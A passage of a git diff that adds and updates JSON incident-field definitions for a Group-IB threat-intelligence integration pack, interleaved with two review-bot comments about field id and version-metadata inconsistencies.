--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Report_Number.json
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat" + ], + "caseInsensitive": true, + "cliName": "gibreportnumber", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibreportnumber", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Report Number", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reporter.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reporter.json new file mode 100644 index 000000000000..2a307ccd4a7b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reporter.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibreporter", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibreporter", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Reporter", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Repository.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Repository.json index bed12b85bb76..56256da2984b 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Repository.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Repository.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB OSI Git Leak" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Categories.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Categories.json new file mode 100644 index 000000000000..cfab294d0ea6 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Categories.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Suspicious IP Scanner" + ], + "caseInsensitive": true, + "cliName": "gibscannercategories", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibscannercategories", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Scanner Categories", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Suspicious IP Scanner" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Sources.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Sources.json
new file mode 100644
index 000000000000..78f61b57f7bc
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Sources.json
@@ -0,0 +1,35 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Suspicious IP Scanner"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibscannersources",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "gibscannersources",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Scanner Sources",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Suspicious IP Scanner"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "5.0.0",
+ "toVersion": "99.99.99"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Screenshot.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Screenshot.json
index 9cd12eac659c..523c7e4dd46e 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Screenshot.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Screenshot.json
@@ -25,5 +25,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Domain"
+ ]
 }
\ No newline at end of file
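Review bot: `"id": "gibscannersources"` in the new GIB_Scanner_Sources file is the only field id in this commit without the `incident_` prefix (compare `"id": "incident_gibscannercategories"` in the preceding file), so the field would be registered under a different id namespace than its siblings; it should read `"id": "incident_gibscannersources",`. The version range `"fromVersion": "5.0.0"` with `"toVersion": "99.99.99"` also diverges from the `"fromVersion": "6.10.0"` every other new field uses and looks like a file copied from an older template; aligning it to `"fromVersion": "6.10.0"` and dropping `toVersion` keeps the pack's minimum-version requirement consistent.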
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_Domain.json new file mode 100644 index 000000000000..9f3f697f2916 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_Domain.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "caseInsensitive": true, + "cliName": "gibservicedomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibservicedomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Service Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_IP.json new file mode 100644 index 000000000000..1c6ea3003f9c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_IP.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "caseInsensitive": true, + "cliName": "gibserviceip", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibserviceip", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Service IP", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_URL.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_URL.json new file mode 100644 index 000000000000..68de7970242e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_URL.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "caseInsensitive": true, + "cliName": "gibserviceurl", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibserviceurl", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Service URL", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Severity.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Severity.json index c76e39ec4538..7e3460152396 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Severity.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Severity.json @@ -8,7 +8,22 @@ "GIB OSI Git Leak", "GIB OSI Public Leak", "GIB Targeted Malware", - "GIB Data Breach" + "GIB Data Breach", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": true, "cliName": "gibseverity", @@ -32,5 +47,32 @@ "unsearchable": true, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Brand Protection Phishing Kit", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB OSI Git Leak", + "GIB OSI Public Leak", + "GIB Targeted Malware", + "GIB Data Breach", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" + ] } \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Socks_Proxy_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Socks_Proxy_Source.json
new file mode 100644
index 000000000000..1f77f1031bf5
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Socks_Proxy_Source.json
@@ -0,0 +1,33 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Suspicious IP Socks Proxy"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibsocksproxysource",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibsocksproxysource",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "GIB Socks Proxy Source",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Suspicious IP Socks Proxy"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Source.json
index 38176fb2d4a6..c27126a6711f 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Source.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Source.json
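Review bot: The new GIB_Socks_Proxy_Source field omits the `"itemVersion": "1.4.2"` entry that every other new field file in this commit carries between `isReadOnly` and `locked`; the GIB_Update_Time and GIB_Upload_Time files further down have the same omission. If itemVersion is stamped by the pack build this is harmless, but then it should be absent from all files rather than three, so the metadata stays uniform; otherwise add `"itemVersion": "1.4.2",` after `"isReadOnly": false,` in each of the three files.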
@@ -4,7 +4,28 @@ "GIB Targeted Malware", "GIB OSI Git Leak", "GIB Compromised Card", - "GIB Compromised Account" + "GIB Compromised Account", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Public Leak", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP Socks Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat", + "GIB Data Breach" ], "caseInsensitive": true, "cliName": "gibsource", @@ -29,5 +50,34 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Targeted Malware", + "GIB OSI Git Leak", + "GIB Compromised Card", + "GIB Compromised Account", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Public Leak", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP Socks Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat", + "GIB Data Breach" + ] } \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_ASN.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_ASN.json new file mode 100644 index 000000000000..6e7ff41a0d54 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_ASN.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetasn", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetasn", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target ASN", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Brand.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Brand.json index 247c80113bae..1f4a8eecf489 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Brand.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Brand.json @@ -26,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing Kit", + "GIB Brand Protection Phishing" + ] } \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Category.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Category.json index c5c98a2716ca..a4daf2c01b6c 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Category.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Category.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_City.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_City.json new file mode 100644 index 000000000000..34e511f6ed64 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_City.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetcity", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetcity", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target City", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain.json index 3a0ed77e19c4..da145a39e926 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Brand Protection Phishing" + "GIB Brand Protection Phishing", + "GIB Attacks Deface" ], "caseInsensitive": true, "cliName": "gibtargetdomain", @@ -25,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Attacks Deface" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain_Provider.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain_Provider.json new file mode 100644 index 000000000000..219fb62f7ce4 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain_Provider.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetdomainprovider", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetdomainprovider", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target Domain Provider", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_IP.json new file mode 100644 index 000000000000..8c09bf43c333 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_IP.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetip", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetip", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target IP", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Provider.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Provider.json new file mode 100644 index 000000000000..6d5a3071edc2 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Provider.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetprovider", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetprovider", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target Provider", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Region.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Region.json new file mode 100644 index 000000000000..21f388997f08 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Region.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibtargetregion", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibtargetregion", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Target Region", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Country.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Country.json new file mode 100644 index 000000000000..f286c696d6ff --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Country.json 
@@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibthreatactorcountry", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibthreatactorcountry", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Threat Actor Country", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_ID.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_ID.json index 79b72dfebadc..3b8bcf53658a 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_ID.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_ID.json @@ -3,7 +3,12 @@ "associatedTypes": [ "GIB Compromised Account", "GIB Compromised Card", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Cybercriminal Threat", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": false, "cliName": "gibthreatactorid", 
@@ -27,5 +32,17 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Targeted Malware", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Cybercriminal Threat", + "GIB Nation-State Cybercriminals Threat" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Name.json index e928560011c3..1656be418b4c 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Name.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Name.json @@ -3,7 +3,14 @@ "associatedTypes": [ "GIB Compromised Account", "GIB Compromised Card", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": false, "cliName": "gibthreatactorname", @@ -27,5 +34,19 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Targeted Malware", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ] } \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_is_APT.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_is_APT.json index 2f925629a332..f024738791bc 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_is_APT.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_is_APT.json @@ -3,7 +3,14 @@ "associatedTypes": [ "GIB Compromised Account", "GIB Compromised Card", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Compromised Card Group", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": true, "cliName": "gibthreatactorisapt", @@ -27,5 +34,19 @@ "unsearchable": false, 